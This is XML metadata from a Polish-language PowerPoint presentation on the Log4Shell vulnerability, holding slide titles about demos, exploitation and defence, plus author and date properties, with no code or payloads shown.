      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>LOG4Shell</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Log4J</vt:lpstr>
      <vt:lpstr>Log4J</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>CVSSv3 score 10</vt:lpstr>
      <vt:lpstr>CVSSv3 score 10</vt:lpstr>
      <vt:lpstr>Demo #1</vt:lpstr>
      <vt:lpstr>LDAP query</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Uruchomienie aplikacji</vt:lpstr>
      <vt:lpstr>CanaryTokens -  canarytokens.org</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Co może wyciekać?</vt:lpstr>
      <vt:lpstr>Demo #2</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Uruchomienie aplikacji</vt:lpstr>
      <vt:lpstr>Podpowiedź</vt:lpstr>
      <vt:lpstr>Exploit</vt:lpstr>
      <vt:lpstr>Demo #3</vt:lpstr>
      <vt:lpstr>CVSSv3 score 10</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Execute command line payload</vt:lpstr>
      <vt:lpstr>Demo #4</vt:lpstr>
      <vt:lpstr>Execute command line payload</vt:lpstr>
      <vt:lpstr>Konkurs #2</vt:lpstr>
      <vt:lpstr>Ochrona</vt:lpstr>
      <vt:lpstr>Obrona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Szpor-Siudyła</dc:creator>
  <cp:lastModifiedBy>Sowa, Grzegorz</cp:lastModifiedBy>
  <cp:revision>5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-04T10:41:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-22T13:08:14Z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0x0101000B89C7F460EBFE4090D6A688321137DB</vt:lpwstr>
  </property>
</Properties>
</file>